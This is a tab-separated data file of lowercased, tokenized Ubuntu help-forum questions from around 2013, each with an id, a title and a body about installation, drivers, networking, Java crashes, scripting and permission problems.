268469	is it better to install 32bit ubuntu for a emt64 processor ?	i got a dell optiplex 9010 recently - it has an intelâž coreâ˘ i7-3770 processor . intel declares in the specifications ( http : //ark.intel.com/products/65719/ ) that it 's compatible with 64bit instruction set . but my bios tells me its emt64 and not a true 64 bit processor . so , which would be a better choice - 32 or 64 bit ubuntu for this ? ( i need to make best possible use of my 16 gb ram , majorly for running monte carlo simulations for physics . )
268470	can i `` refill '' the persistence ?	i 've just created a ubuntu 12.04 lts live usb with persistence ( 3gb ) on a 4gb usb flash drive . i was wondering whether i could install a program ( or a file , something that takes up space ) and then when i delete/remove it i will get that space back . ( if not ) how does that persistence work exactly ?
268473	windows xp does n't recognize ubuntu 10.04 dvd	my problem is next : i insert ubuntu 10.04 ( i want 10.04 not any other versions , cause my computer can not run them ) dvd , and turn on my computer . i 'm waiting for a while in hope that it 'll start live preview and give me the chance to install it , but it just skips on the windows xp start up . i checked bios setting they are seted up like they should be , dvd works 100 % cause i installed ubuntu 10.04 from the same dvd on machine that is runned by windows 8 . so , what can be problem and how can i solve it ? i really need ubuntu for my studying ! i hope somebody will help me . regards all .
268479	is there a way to see what content is on which partition ?	after trying out ubuntu , kubuntu and xubuntu by working in them for a few weeks , i have now decided on which distribution to use . now i want to delete the partitions that holds the versions that i no longer need . i use gparted to manage my partitions , but it will only show me partition names , and not the content . i ca n't seem to find any place when booting the different partitions that informs me of the partition . how do i see what content is on which partition ?
268480	12.04 install problem , configuring hardware	been trying different things for several hours now , the install comes to a halt when i reach the configuring hardware part of the installation . have nvidia gtx580 and asus rog maxius gene-z . did have gpu hangup when i instaled without disabling the feature in f6 like i read on the net . any ideas ?
268483	lightdm not behaving as expexted	i seem to be having some odd lightdm behavioral issues . so far this what i have in my /etc/lightdm/lightdm.conf file : user-session=gnome-classic greeter-session=unity-greeter greeter-show-manual-login=true allow-guest=false greeter-hide-users=true how i 'd expect lightdm to behave based on the above is the means to type in a username , list of available users hidden and the guest account not available . however all i get is as follows : i 've read on these forums and elsewhere that unless greeter-session is set to lightdm-gtk-greeter the options in my lightdm.conf file will not be honored . however , if i make the changes accordingly then reboot , all i see is as follows : i 'm running 12.04.2 within a vm . any help would be greatly appreciated . thanks in advance , dan .
268488	running bin file in bash script	i want to build a bash script that runs a bin file . however the question is : how to continue the script even after bin operation is completed to perform other commands ?
268492	how do i get more up to date silverlight/moonlight ?	for the german video streaming site skygo , i need silverlight > = 4.06 . i installed the most recent moonlight plugin from http : //www.go-mono.com/moonlight/download.aspx but this version is to old to work on that streaming site . is there a more recent ( developer ) version ? if so , how can i install it ? is there any other way to get nasty closed source drm locked down streaming sites running ?
268493	irritating window stuck always on top	10 . sometimes there is a small window ( corrupt ) appearing , once it is there , it sticks there on top of all , irrespctive of whatever i do except logout . i have tried different options like cinnamon , gnome , unity but changing desktop env does n't affect . here are screenshots https : //plus.google.com/photos/117223692780140475095/albums/5855916079499435233/5855916086224463218 https : //plus.google.com/photos/117223692780140475095/albums/5855916079499435233/5855916080221541970 any suggestions ?
268500	wifi and sound not working and trackpad acting strange on macbook 5,2 with ubuntu 12.10	i 'm pretty much completely new to ubuntu but felt like i wanted to explore it to see what all the fuzz was about so i went through the hassle on installing it on a 32gb partition on my mid 2009 macbook white but as the title suggests i 'm having some trouble setting up my system post-install . i 'm not able to get wifi working ( i 'm able to get internet through cable though ) . sound was working when running ubuntu on the live cd but not when installed . the trackpad is being all jerky and not at all as smooth in it 's movements as in os x. i 'm not sure if ubuntu has got drivers for my graphics card ( nvidia geforce 9400m 256mb ) . is there any way to get the cmd-key to work as in os x instead of using ctrl ( i could get used to this but it 's just a matter of comfortability ) . as i said i 'm completely new to ubuntu so i will probably need quite detailed instructions on how to work out my problems , thanks in advance !
268501	failed to download packages from software center	i tried to install many softwares from software center like vlc , quickly etc but failed to download and install them on my ubuntu . it gave this error . failed to download package . please help me .
268502	network problems with ubuntu server 12.10	hey guys im new to the world of ubuntu from what ive been doing so far there is loads of help and it been grate but now ive hit a problem . i am running ubuntu server 12.10 , and my connection speed is not playing ball . my router is tell me that i have download speeds of 8mb/s but when i download some thing through the server im only getting around 300kb/s . i 'm using an cat6 ethernet cable to connect my server to the router and my network card is able to gain speeds of upto 1gb/s . this is also some thing im struggling to figure out every example i have looked at you all use eth0 etc . my connection on the other hand is showing : ultrabeat @ minetechmc : ~ $ ifconfig -a p131p1 link encap : ethernet hwaddr 00:50:43:00:13:9b inet addr:192.168.1.123 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :250:43ff : fe00:139b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:373282 errors:0 dropped:0 overruns:0 frame:0 tx packets:199898 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:561559942 ( 561.5 mb ) tx bytes:13461545 ( 13.4 mb ) interrupt:19 # the primary network interface auto p131p1 iface p131p1 inet dhcp would this be the problem and if so can anyone shed some light on how to fix this ?
268504	how to install software provided in software-center via terminal ?	can anyone help me providing terminal command to download and install the software provided by software center ? actually i 'm searching for command to download and install kdbg ( debugger ) via terminal .
268508	touch pad is detected as a generic mouse device in 12.04	my touchpad seems like ps/2generic mouse device with the output xinput . i can not set it correctly albeit i gave some tries . in addition its multitouch functions do not work becasue of this detection issue . here is the output of xinput list virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=10 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=11 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=15 [ slave pointer ( 2 ) ] ⎣ ... in addition , the problem occured after i tried to activate right click of my touch pad with following command from synaptic touchpad right-click not working sudo su echo options psmouse proto=exps > /etc/modprobe.d/psmouse.modprobe reboot how can i check all the problems out and get my touchpad working all correctly ?
268512	how to create a .bin file ?	i am using ubuntu 12.04 lts and i am stuck at creating a simple .bin file which can print a message `` hi '' or anything else . my objective is to create a binary file.i have searched but did n't found anything helpful to me . so may i know how can i create a .bin file .
268513	how to install weather indicator on ubuntu 12.04 ?	i tried to install it from the market but that 's what it says
268514	weird change of owner for user home dir when installing vettle	all of a sudden my home dir turned to be owned by user '1016 ' : drwxr-xr-x 96 1016 1016 20480 apr 2 2010 albert drwxr-xr-x 32 guest guest 4096 mar 16 13:46 guest i do n't understand how that changed . i just noticed because i could n't write files or anything on my home directory during my open session . i rebooted and complained of ' can not creat file .iceauthority ' . what could have caused this weird change in ownership to owner 1016 ? a virus perhaps ? i logged in as guest and did a ssh albert @ localhost to then do a : sudo chown -r albert : albert /home/albert/ . is that going to be enough ?
268515	need a kid-safe browser like zoodles	i have a six year old little sister . she gets online . my parents want her on a kid safe browser like zoodles . are there any for linux ? is it possible to install zoodles on linux ? all the ones i 've found download the install stuff for windows . also . i 'm brand new to linux , so instructions on how to would be much appreciated . =3 i have ubuntu 12.10 , just in case that matters .
268517	ubuntu just crashed when i login no desktop loads up	hi guys ubuntu has just crashed on me , what now happens is when i log in as the main user i get no desktop loades up just the desktop background also i ca n't access my terminal using ctrl , alt etc . what is weird is that if i login as the guest everything works . but i have all of my university work on my main login so i am really worried and would be very grateful for some help , thanks guys .
268519	removing windows	i 've been running precise and xp in a dual-boot on my laptop for several months now . i 'd like to pull the plug on xp and reclaim that wasted ntfs space . what 's the easiest way to do that ?
268525	ubuntu 12.04.1 lts init process using all swap space and free memory	mem : 16402220k total , 16165840k used , 236380k free , 132244k buffers swap : 4194296k total , 4191452k used , 2844k free , 1208664k cached pid user pr ni virt res shr s % cpu % mem time+ command 10693 mysql 20 0 12.5g 8.3g 4248 s 3 52.9 6320:38 mysqld 303 root 20 0 0 0 0 s 0 0.0 263:23.29 md3_raid1 10120 root 20 0 17340 1236 896 r 0 0.0 0:00.04 top 15434 root 20 0 0 0 0 r 0 0.0 0:37.72 kworker/0:2 1 root 20 0 8800m 4.8g 636 s 0 31.0 41:38.48 init anyone have any idea why init is using so much swap space and memory ? how do i begin to debug this , any pointers in the right direction will be appreciated .
268526	scheduled tasks running but have disappeared	i had recently installed gnome-schedule 2.1.1-4 onto my ubuntu 12.10 so that i may be able to schedule a recurrent shutdown on my laptop everyday at 1:55 pm . after a few days when i did n't need the scheduled shutdown task any more so i wished to remove it . even though it still shuts down at 1:55 pm but the task is n't visible in the task schedule window on gnome-schedule 2.1.1-4. how do i remove this task ?
268529	how to install dota in ubuntu 12.10	i am using linux for the very first time and i have one question.is it possible to install dota ? and if it is , could someone to help me install it ?
268530	ubuntu 12.10 64-bit consuming 100 % cpu power and high battery	i am new linux user , installed ubuntu 12.10 ( 64-bit ) from wubi ( getting boot option ( windows7/ubuntu ) . but after opening ubuntu , laptop gets heat up , fan running very fast and performance is very poor , while installing graphics driver it hangs and i have to shut system by long pressing power button . battery backup ends very soon ( almost 1/5 as compared to win 7 ) i installed powertop , it is showing 100 % cpu usage . i searched for the problem , but there are many solutions given online , i have tried some but no success . system specs : hp pavilion dv4 , intel core i5 ( 2nd gen ) , 6 gb ram
268531	can not execute sudo apt-get update	i am new to ubuntu and when i execute sudo apt-get update i get the following errors and warnings w : gpg error : http : //ppa.launchpad.net quantal release : the following signatures could n't be verified because the public key is not available : no_pubkey 5a9a06aef9cb8db0 w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/release.gpg something wicked happened resolving 'security.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/release.gpg something wicked happened resolving 'extras.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //packages.medibuntu.org/dists/quantal/release.gpg something wicked happened resolving 'packages.medibuntu.org : http ' ( -5 - no address associated with hostname ) e : some index files failed to download . they have been ignored , or old ones used instead . can anyone tell me what is wrong ?
268532	can ubuntu translate an app to english	i apologise if this is a stupid question i installed an app called love wallpaper hd from here using the .deb download as you can see it 's chinese . i ca n't seem to find an english language version . is there a way to translate so it displays in english . although it 's not essential to make the programme usable as it 's fairly self explanatory , it would be nice as it 's a wonderful programme . running ubuntu 12.10 64 bit
268537	ubuntu server 12.04/12.10 not getting past `` select a language ''	i am trying to install ubuntu server on my pc , i have burned the iso to an cd and tried to burn it on a usb , in both cases it hangs at `` select a language '' i can not move nor select anything . i have try several things but i do not know how to get past this , could anyone please help ? kind regards .
268539	unable to locate package python-pip	hi i am trying to install electrum in my ubuntu live usb . please forgive me because i am very new to this os . i have also made a presistence 4gb space for future installation sofwares . how can i get pass this error ? please help . i tried using sudo apt-get update first but i still get e : unable to locate package python-pip error when i install .
268541	webex crashing/lockup firefox / chromium browsers - ubuntu 12.10	when launching webex from firefox or chromium browser . browser freezes and stops responding . browser process must be killed to exit . please help me troubleshoot this . here are my setup details and error messages i have gathered below : setup : ubuntu 12.10 and all software updates installed . from java console : java plug-in 1.6.0_43 using jre version 1.7.0_17-b02 java hotspot ( tm ) client vm running file which java javac shows the following : /usr/bin/java : symbolic link to `/etc/alternatives/java' /usr/bin/javac : symbolic link to `/etc/alternatives/javac' i have several java 's loaded : running command sudo update-alternatives -- config java produces : there are 4 choices for the alternative java ( providing /usr/bin/java ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- * 0 /usr/lib/jvm/java-6-oracle/jre/bin/java 1082 auto mode 1 /usr/lib/jvm/java-6-openjdk-i386/jre/bin/java 1061 manual mode 2 /usr/lib/jvm/java-6-oracle/jre/bin/java 1082 manual mode 3 /usr/lib/jvm/java-7-openjdk-i386/jre/bin/java 1071 manual mode 4 /usr/lib/jvm/java-7-oracle/jre/bin/java 1081 manual the java console produces the following output when attempting to start webex : java plug-in 1.6.0_43 using jre version 1.7.0_17-b02 java hotspot ( tm ) client vm user home directory = /home/tony -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- c : clear console window f : finalize objects on finalization queue g : garbage collect h : display this help message l : dump classloader list m : print memory usage o : trigger logging q : hide console r : reload policy configuration s : dump system and deployment properties t : dump thread list v : dump thread stack x : clear classloader cache 0-5 : set trace level to < n > -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- java.lang.exceptionininitializererror at com.sun.deploy.net.protocol.https.handler.openconnection ( handler.java:97 ) at java.net.url.openconnection ( url.java:971 ) at sun.net.www.protocol.jar.jarurlconnection. < init > ( jarurlconnection.java:84 ) at sun.plugin.net.protocol.jar.cachedjarurlconnection. < init > ( cachedjarurlconnection.java:58 ) at sun.plugin.net.protocol.jar.handler.openconnection ( handler.java:18 ) at java.net.url.openconnection ( url.java:971 ) at com.sun.deploy.security.deployurlclasspath $ jarloader.getjarfile ( deployurlclasspath.java:797 ) at com.sun.deploy.security.deployurlclasspath $ jarloader.access $ 1000 ( deployurlclasspath.java:678 ) at com.sun.deploy.security.deployurlclasspath $ jarloader $ 1.run ( deployurlclasspath.java:745 ) at java.security.accesscontroller.doprivileged ( native method ) at com.sun.deploy.security.deployurlclasspath $ jarloader.ensureopen ( deployurlclasspath.java:737 ) at com.sun.deploy.security.deployurlclasspath $ jarloader. < init > ( deployurlclasspath.java:699 ) at com.sun.deploy.security.deployurlclasspath $ 3.run ( deployurlclasspath.java:407 ) at java.security.accesscontroller.doprivileged ( native method ) at com.sun.deploy.security.deployurlclasspath.getloader ( deployurlclasspath.java:396 ) at com.sun.deploy.security.deployurlclasspath.getloader ( deployurlclasspath.java:373 ) at com.sun.deploy.security.deployurlclasspath.getresource ( deployurlclasspath.java:237 ) at sun.plugin2.applet.plugin2classloader $ 2.run ( plugin2classloader.java:1006 ) at java.security.accesscontroller.doprivileged ( native method ) at sun.plugin2.applet.plugin2classloader.findclasshelper ( plugin2classloader.java:995 ) at sun.plugin2.applet.applet2classloader.findclass ( applet2classloader.java:129 ) at sun.plugin2.applet.plugin2classloader.loadclass0 ( plugin2classloader.java:263 ) at sun.plugin2.applet.plugin2classloader.loadclass ( plugin2classloader.java:193 ) at sun.plugin2.applet.plugin2classloader.loadclass0 ( plugin2classloader.java:253 ) at sun.plugin2.applet.plugin2classloader.loadclass ( plugin2classloader.java:193 ) at sun.plugin2.applet.plugin2classloader.loadclass ( plugin2classloader.java:174 ) at java.lang.classloader.loadclass ( classloader.java:356 ) at sun.plugin2.applet.plugin2classloader.loadcode ( plugin2classloader.java:703 ) at sun.plugin2.applet.plugin2manager.createapplet ( plugin2manager.java:3031 ) at sun.plugin2.applet.plugin2manager $ appletexecutionrunnable.run ( plugin2manager.java:1497 ) at java.lang.thread.run ( thread.java:722 ) caused by : java.lang.classcastexception : sun.security.ssl.x509trustmanagerimpl can not be cast to com.sun.net.ssl.internal.ssl.x509extendedtrustmanager at com.sun.deploy.security.x509extendeddeploytrustmanager. < init > ( x509extendeddeploytrustmanager.java:113 ) at com.sun.deploy.net.protocol.https.handler $ initializer $ 1.run ( handler.java:70 ) at java.security.accesscontroller.doprivileged ( native method ) at com.sun.deploy.net.protocol.https.handler $ initializer. < clinit > ( handler.java:40 ) ... 31 more exception : java.lang.exceptionininitializererror
268542	how can i install unity from recovery mode ?	my computer crashed and my desktop does not load up and i have no terminal using ctrlaltt etc , so i uninstalled compiz from root shell prompt . this has removed unity so now i need to re-install it in recovery mode : apt-get install unity returns not using locking for read only lock file /var/lib/dpkg/lock
268544	graphics problem after ubuntu 12.04 installation	what i got after ubuntu 12.04 installation : http : //i.stack.imgur.com/ljs49.jpg any solution ?
268549	weird thing about wifi in ubuntu	there is wifi near my house which i use . it 's an open wifi network but it requires login and password once i connect to it by redirecting to login page . everything is okay because i have them because i pay for it . the funny thing is that in ubuntu it does n't work like in windows . it does work fast but it `` disconnects '' me every 30 seconds or every minute by displaying `` unable to connect to the internet '' standard page . to be able to `` reconnect '' i have to reload a page about 20 times . only after that it downloads it again and works fine for about 30 seconds . by `` disconnect '' and `` reconnect '' i do n't mean that i get disconnected from that wifi net . it has a connection all the time i use the internet and that 's fine . but the browser shows me ( any browser in ubuntu ) the page of `` unable to connect to the internet '' and that 's how it works . in windows i do n't have that problem ! the owner of wifi does n't know why it 's happening . what do i do about that ? update : it turned out that it required to wait for 30-60 seconds instead of reloading and after that i was able to download the page again . but the problem has not gone yet .
268556	version mismatch : ubuntu 12.04 got installed with linux 3.5 kernel	i downloaded wubi.exe from the nz mirror . see the file at the bottom of this page the installation worked fine and i am running ubuntu now . but it seems to have installed ubuntu 12.04 with headers for linux kernel 3.5 ( instead of 3.2 ) furthermore , when i tried apt-get install linux-source , it installed kernel source for 3.2 . output of various commands is seen below . can anyone shed light on what might have contributed to this version mismatch ? $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.2 lts release :12.04 codename : precise $ uname -a ( says 3.5 is running ) linux ubuntu 3.5.0-25-generic # 39~precise1-ubuntu smp tue feb 26 00:07:14 utc 2013 x86_64 x86_64 x86_64 gnu/linux $ cat /proc/version linux ubuntu 3.5.0-25-generic # 39~precise1-ubuntu smp tue feb 26 00:07:14 utc 2013 x86_64 x86_64 x86_64 gnu/linux ( linux headers for 3.5 got installed during normal installation ; later i did apt-get for the linux-source and it downloaded source for 3.2 as seen below ) $ ls -l /usr/src total 3 drwxr-xr-x 24 root root 1024 mar 16 04:12 linux-headers-3.5.0-25 drwxr-xr-x 7 root root 1024 mar 16 04:12 linux-headers-3.5.0-25-generic drwxr-xr-x 26 root root 1024 mar 16 16:06 linux-source-3.2.0 lrwxrwxrwx 1 root root 45 feb 19 18:57 linux-source-3.2.0.tar.bz2 - > linux-source-3.2.0/linux-source-3.2.0.tar.bz2 also , cat /usr/include/linux/version.h shows \ # define linux_version_code 197157
268557	bash menu issue / question ?	there is another thread for this topic but it is closed . i would like to revisit this . i m trying to write a utility script for myself . however i am not a programmer so i wanted to get some feed back . although i do appreciate others attempt to help , i do not want to go off on a tangent and have to read a bunch of stuff . my need is very specific . ps3='please enter your choice : ' options= ( `` option 1 '' `` option 2 '' `` option3 '' `` quit '' ) select opt in `` $ { options [ @ ] } '' do case $ opt in if [ `` $ resp '' = `` y '' ] ; then action here else echo `` thank you . '' sleep 2 exit ; fi ; ; `` option 2 '' ) echo `` you chose choice 2 '' ; ; `` option 3 '' ) echo `` you chose choice 3 '' ; ; `` quit '' ) break ; ; * ) echo invalid option ; ; esac done how do i get from the exit ; or fi back to the menu ? thanks very much ,
268558	how to install ubuntu on a laptop external hdd for use in another pc ?	i have several intel pentium ii 333 based pcs which i want to install ubuntu on . all pcs are identical , however they have no floppy nor do they have a cd drive . they all use 2½ hdd . i intend on using my laptop to install ubuntu onto the hdd in an external enclosure , then install the hdd in to the pcs and run ubuntu . the pcs will not boot from usb .
268559	ant error after installing netbeans 7.3 in lubuntu	i have netbeans 7.01 from debian repository - all works . i have problem with netbeans 7.3 from official site ( installed at the same machine ) - i ca n't compile anything : error - ant is misconfigured and can not be run . java.lang.classnotfoundexception : org.apache.tools.ant.module.bridge.impl.bridgeimpl at java.net.urlclassloader $ 1.run ( urlclassloader.java:366 ) at java.net.urlclassloader $ 1.run ( urlclassloader.java:355 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:354 ) at org.apache.tools.ant.module.bridge.antbridge $ mainclassloader.findclass ( antbridge.java:647 ) at java.lang.classloader.loadclass ( classloader.java:423 ) at java.lang.classloader.loadclass ( classloader.java:356 ) at org.apache.tools.ant.module.bridge.antbridge.createantinstance ( antbridge.java:299 ) at org.apache.tools.ant.module.bridge.antbridge.getantinstance ( antbridge.java:279 ) at org.apache.tools.ant.module.bridge.antbridge.getinterface ( antbridge.java:268 ) at org.apache.tools.ant.module.run.targetexecutor.run ( targetexecutor.java:541 ) at org.netbeans.core.execution.runclassthread.run ( runclassthread.java:153 ) lubuntu x32 , all updates . nimbus plugin . in options - > java - > ant - > ant home i ca n't choose valid folder . i tried usr/share/ant , but ant not found : java.lang.classnotfoundexception : org.apache.tools.ant.module.brigge.impl.bridgelmpl , but i have _ant.jar_ in this directory
268560	how to fix ubuntu 12.04 display artefacts/freezes after switching users ?	some time ago i noticed a strange behaviour on my computer running ubuntu 12.04 . here 's a detailed description of the problem : i log into my account , work for some time , and then somebody else wants to use the computer so i switch users to the guest session . after some time i get back and also switch back to my account ( without logout/login all the time ) . now my display always freezes upon actions with the unity desktop . if i select an application or scroll through the sidebar or even if i start a program and a window is created . everytime my computer freezes for about ~10sec before continuing . also there are strange artefacts appearing ( yellow or green blinking fields sidebar descriptions ) and if i scroll through a page in firefox the upper `` taskbar '' is somehow `` mirrored '' into the page ( but upside down ) . i usually then have to restart lightdm to fix this problem , but it 's a bit annoying to always restart lightdm . how can i fix this behaviour ? thank you very much !
268561	disable touch drag	i am using touchpad on my laptop , but sometimes when i move pointer around it starts dragging ( touch drag ) . i prefer to drag while holding it down . can this touch drag be disabled ?
268564	upgrade from 12.04 to 12.10 loops and fails with `` unable to get exclusive lock ''	i 'm trying to upgrade from 12.04 to 12.10 but it consistently fails in the same way . first , the upgrade process loops ( do-release-upgrade ) by going through the following many times reading package lists ... done building dependency tree ... done reading state information ... done building data structures ... done then it dies with `` unable to get exclusive lock '' . i am not running another package manager , so this is not a duplicate of unable to use package manager due to `` exclusive lock '' error . anybody has any ideas how to go about fixing this ? i tried looking at the logs in /var/log/dist-upgrade but i could n't find any useful error information .
268565	intall burg in fakeraid uefi system	i am currently dual booting windows 8 and ubuntu 12.10 in uefi mode , on a system with a fake ( motherboard ) raid 0 configuration . i first installed windows 8 , then ubuntu 12.10 and used bootrepair to set up grub2 configuration automatically . everything is working , however i want to install burg , and i do not know where to install it with burg-install . it seems that grub2 is using windows efi partition to mount /boot/efi : joao @ desktop-qq : ~ $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 76.7g 0 disk └─isw_eaidfhhhaa_raid ( dm-0 ) 252:0 0 153.4g 0 dmraid ├─isw_eaidfhhhaa_raid1 ( dm-1 ) 252:1 0 300m 0 part ├─isw_eaidfhhhaa_raid2 ( dm-2 ) 252:2 0 99m 0 part /boot/efi ├─isw_eaidfhhhaa_raid3 ( dm-3 ) 252:3 0 128m 0 part ├─isw_eaidfhhhaa_raid4 ( dm-4 ) 252:4 0 99.5g 0 part /media/joao/bebe305b └─isw_eaidfhhhaa_raid5 ( dm-5 ) 252:5 0 53.4g 0 part / sdb 8:16 0 76.7g 0 disk └─isw_eaidfhhhaa_raid ( dm-0 ) 252:0 0 153.4g 0 dmraid ├─isw_eaidfhhhaa_raid1 ( dm-1 ) 252:1 0 300m 0 part ├─isw_eaidfhhhaa_raid2 ( dm-2 ) 252:2 0 99m 0 part /boot/efi ├─isw_eaidfhhhaa_raid3 ( dm-3 ) 252:3 0 128m 0 part ├─isw_eaidfhhhaa_raid4 ( dm-4 ) 252:4 0 99.5g 0 part /media/joao/bebe305b └─isw_eaidfhhhaa_raid5 ( dm-5 ) 252:5 0 53.4g 0 part / so where exactly should i point burg-install ? on the other hand , my goal is just to have a graphical interface to the bootloader , and i was wondering if that 's possible with any of the grub2 efi alternatives ( elilo , refind , etc ) ?
268568	why can i not use my bsnl usb modem ( lw273 ) ?	i have bsnl usb modem lw273 7.2mbps data card . i had used it on windows 7 . now i use ubuntu 12.10 . but i am unable to use this usb modem on ubuntu .
268569	ubuntu 12.04 detect notebook driver as vmware	i bought samsung n100 notebook yesterday . i installed ubuntu 12.04 ( only os ) . after successfully installed i found that unity 3d is not working . so run jocky-3d for additional driver . i found two driver in list and installed . drm driver for the intel gma500 intel cedarview graphics driver after reboot , visual looks good but still unity 3d did n't load . system settings returns gallium 0.4 on llvmpipe ( llvm 0x300 ) then i ran unity test . pvrdriinitpvr2d : pvr2d device index ( 0 ) **opengl vendor string : vmware , inc.** opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x300 ) opengl version string : 2.1 mesa 8.0.4 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no surprising news is that opengl vendor string returns vmware , inc. what does this means ? ubuntu detects my notebook as vmware client ? ? additional info : server glx version string : 1.4 client glx vendor string : mesa project and sgi client glx version string : 1.4 opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x300 ) opengl version string : 2.1 mesa 8.0.4 opengl shading language version string : 1.20 vga compatible controller : intel corporation atom processor d2xxx/n2xxx integrated graphics controller ( rev 0b ) ( prog-if 00 [ vga controller ] )
268571	the liveusb username	i use a persistent usb with ubuntu and it asks me the user . since i can not access root i need the liveusb username , which i forgot .
268576	error installing grails - unmet dependencies	i am installing grails on 12.10 , using the instructions on grails.org , but am getting an error on the 3rd step , as outlined below . sudo add-apt-repository ppa : groovy-dev/grails sudo apt-get update sudo apt-get install grails-ppa the error i get is shown below . i have the sun jdk installed , and java_home is set , and java_home/bin is on the path . can someone suggest things to try to resolve this ? sudo apt-get install grails-ppa reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : default-jre-headless : i386 : depends : openjdk-7-jre-headless : i386 ( > = 7~u3-2.1 ) but it is not going to be installed openjdk-7-jre : i386 : depends : openjdk-7-jre-headless : i386 ( = 7u7-2.3.2a-1ubuntu1 ) but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . java -version java version `` 1.6.0_39 '' java ( tm ) se runtime environment ( build 1.6.0_39-b04 ) java hotspot ( tm ) 64-bit server vm ( build 20.14-b01 , mixed mode )
268580	installing ubuntu 12.10 vm on a win 7 host	i attempted to install ubuntu 12.10 on oracle virtual box and i had difficulties . i am using a windows 7 64-bit host machine . i set the vdi disk size to dynamic at 8gb and the base memory at 644mb . i tried several network setting initially . however the last attempt was using a bridged adapter and it seemed to connect to the internet using the settings from the host machine ( win 7 - 64 bit ) . what else do i need to do after i install ? how do i configure my ubuntu 12.10 desktop on virtual box . are there any other v-box settings to add ? thanks
268581	how to check if any background process is utilizing the internet connection ?	my internet speed is 4 mbps . in windows , i get 2 mbps download bandwidth , but in ubuntu 12.04 lts i only get a maximum of 20 kbps . why is it so ? is there any background process which might be utilizing the internet connection ? if yes , then how do i know that ?
268587	how to display messages from kernel module without using dmesg ?	in order to display the messages loaded into a kernel module , i can use the command dmesg is there any alternatives for this command ? how this function gets all these kernel messages ?
268588	how do i run software as an administrator using wine/playonlinux ?	today i was wondering if i could run a program i installed on a virtual drive as an administrator ? i installed cain and abel on this drive , when i run the program it works fine . but in order for it to actually work , you need to run as admin . does anyone know how i can accomplish this ?
268590	usb bootable computer does n't recognize the content of the key	i 'm a noob and this is my deflowering with ubuntu . ( stop laughing at me ) i have a old computer with just xp on it . cd-rom devices installed but out of order and seems to be able to boot on usb ( it says `` removable '' in the bios in the boot sequence order ) . i have 2 differents hdd with ntfs partitions also . i have made a usb bootable stick with lili and it works just fine on my other computer ( more recent ) . so i know this stick is working well . i put this stick in the old xp computer , with the bios booting on this `` removal '' first , and it says `` insert disk system blablabla ... '' in short : no ! in the boot sequence order , i have the choice between hdd , cd , usb-cd , and removal . i tried also with usb-cd , same result . so , like a noob , i loaded the content of the key on my other hdd ( ntfs ) . windows knew that hdd was now ubuntu bootable as i got the proper icon after in `` my computer '' . i went back to my bios , set the boot on this hdd first , and ... same result : insert disk system . why ? and what can i do to solve this ? many thanks in advance
268591	retrieveing files	is it possible to retrieve files that i prevoiusly shift+delete ed ? instead of shift+c i pressed shift + delete ( i know they 're not even close on the keyboard : s ) . i know on windows it is possibly using some software , but is it possible on ubuntu 10.04 also ?
268606	transmission daemon : permission denied even if debian-transmission has root group	i 've got something really strange . transmission-daemon keeps telling me '' permission denied /home/transmission/downloads/.. '' ( .. = name of torrent folder and files ) i created this folder transmission : sudo mkdir /home/transmission after this i 've created folders inside : sudo mkdir /home/transmission/incomplete sudo mkdir /home/transmission/downloads give permission first just by making these folders from debian-transmission : sudo chgrp -r debian-transmission : debian-transmission /home/transmission added myself to this group : sudo usermod -a -g debian-transmission kurt but still no access i could edit and add files to the downloads folder so i 've added my group kurt to debian-transmission . sudo usermod -a -g kurt debian-transmission permission denied.. hmmm . okay then chmod this folder to 777. sudo chmod 777 -r /home/transmission permission denied.. last thing i could do : sudo usermod -a -g root debian-transmission but nothing helps . i know this is not a good way . but i just wanted to test if this would work . i 've restarted transmission service after every permission change just to be sure . some extra information : ps aux | grep transmission output : 117 17319 0.4 0.4 397624 10196 ? ssl 18:33 0:05 /usr/bin/transmission-daemon -f -- config-dir /var/lib/transmission-daemon/info kurt 17767 0.0 0.0 13580 900 pts/0 s+ 18:52 0:00 grep -- color=auto transmission ps -ef | grep transmission 117 17319 1 0 18:33 ? 00:00:05 /usr/bin/transmission-daemon -f -- config-dir /var/lib/transmission-daemon/info kurt 17827 17229 0 18:53 pts/0 00:00:00 grep -- color=auto transmission groups debian-transmission debian-transmission root kurt groups kurt kurt adm cdrom sudo dip plugdev lpadmin sambashare debian-transmission anyone that has a good solution for my problem ?
268619	windows xp will not boot after installing ubuntu	i followed the installation directions for ubuntu to windows xp . after install was complete the computer would not reboot . andy suggestions ?
